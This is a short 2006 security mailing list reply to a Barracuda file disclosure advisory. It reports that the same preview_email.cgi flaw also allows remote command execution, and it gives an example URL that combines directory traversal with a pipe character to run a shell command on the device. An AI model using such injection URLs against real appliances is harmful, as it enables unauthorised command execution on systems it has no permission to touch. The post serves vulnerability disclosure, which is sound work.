[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: Barracuda Vulnerability: Arbitrary File Disclosure [NNL-20060801-02]
- To: gssincla@xxxxxxxxxxxxxxx
- Subject: Re: Barracuda Vulnerability: Arbitrary File Disclosure [NNL-20060801-02]
- From: Matthew Hall <lists@xxxxxxxxxx>
- Date: Thu, 03 Aug 2006 17:01:01 +0100
gssincla@xxxxxxxxxxxxxxx wrote:
> Title: Barracuda Arbitrary File Disclosure
This vulnerability doesn't just allow arbitrary file disclosure, but
also allows remote execution of commands through use of the pipe
characher (|), e.g:
https://<deviceIP>/cgi-bin/preview_email.cgi?file=/mail/mlog/../../bin/ls%20/|
Regards,
Matt